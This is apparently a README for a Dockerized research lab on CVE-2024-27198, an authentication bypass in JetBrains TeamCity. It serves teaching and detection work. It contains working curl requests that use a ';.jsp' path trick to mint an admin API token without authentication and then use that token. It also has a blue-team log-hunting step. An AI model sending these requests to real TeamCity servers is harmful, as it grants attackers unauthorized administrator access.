Lab for the CVE-2024-27198
Vulnerability Research & Purple Team Demonstration Lab for JetBrains TeamCity Authentication Bypass (CVE-2024-27198)
TeamCity provides an admin-only page for token management that is not protected by authentication. This allows an unauthenticated user to generate an access token for the admin user if they can find an ID of an existing user.
This repository contains a complete reproducible Dockerized lab with both vulnerable (:8111) and patched (:8112) TeamCity environments, automated exploitation scripts (exploit.py), Blue Team log-hunting walkthroughs, and a live SIEM event simulator (siem_simulator.py).
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
The vulnerability lies in the REST API routing mechanism. By appending specific characters (like ?jsp=/app/rest/...;.jsp) to an unauthenticated endpoint, attackers can trick the TeamCity web server into routing the request to an authenticated endpoint while bypassing the security filters. This requires zero prior knowledge or access, making it a pure 9.8 CVSS.
To get a local copy of this lab up and running follow these simple example steps.
curlgit clone [email protected]:cmpnn-romain/CVE-2024-27198_Lab.git
cd CVE-2024-27198_Lab
docker compose up -d
Username:
admin
Password:
admin
GET request for a resource without authentication:
curl -i http://localhost:8111/app/rest/users
curl -i http://localhost:8112/app/rest/users
Both should return an error with 401 status code.
curl -X POST -H "Content-Type: application/json" \
"http://localhost:8111/hax?jsp=/app/rest/users/id:1/tokens/REDTEAM;.jsp" \
-d '{"name":"REDTEAM"}'
This should return a token like this (The token is different every time):
eyJ0eXAiOiAiVENWMiJ9.T1AzMHJjY3piNC1QWDlFenpnLXdCUkRuSF84.ZmJlODg3ZDQtNjFmYy00ZGQxLTk2MDAtYmJlYjViZjE4NGFi
curl -X POST -H "Content-Type: application/json" \
"http://localhost:8112/hax?jsp=/app/rest/users/id:1/tokens/REDTEAM;.jsp" \
-d '{"name":"REDTEAM"}'
This should return an error with 401 status code because the patched instance does not have the vulnerability.
curl -i -H "Authorization: Bearer <TOKEN>" \
http://localhost:8111/app/rest/users
Should return the list of users.
During the demonstration on the lab, you can show a massive Blue Team finding: by default, this vulnerability is incredibly stealthy!
;.jsp HTTP requests are not logged.So how do we catch it? When the attacker cleans up their tracks! When the attacker deletes their rogue token to hide, TeamCity does log that.
Find the attacker covering their tracks in the audit logs:
docker exec teamcity-vulnerable grep "delete_token" /opt/teamcity/logs/teamcity-activities.log
(You will see a log entry indicating that the "REDTEAM" token was deleted).
docker compose down
This vulnerability is an instance of CWE-288: Authentication Bypass Using an Alternate Path or Channel.
The flaw stems from a path confusion issue between the Tomcat web server and the TeamCity application router. By appending ;.jsp and passing the target REST API endpoint in the jsp= parameter, the initial security filter interprets the request as an unauthenticated request to a public .jsp file (which is allowed). However, the internal router strips the ;.jsp and forwards the request to the restricted /app/rest/ endpoint without enforcing the authentication filter.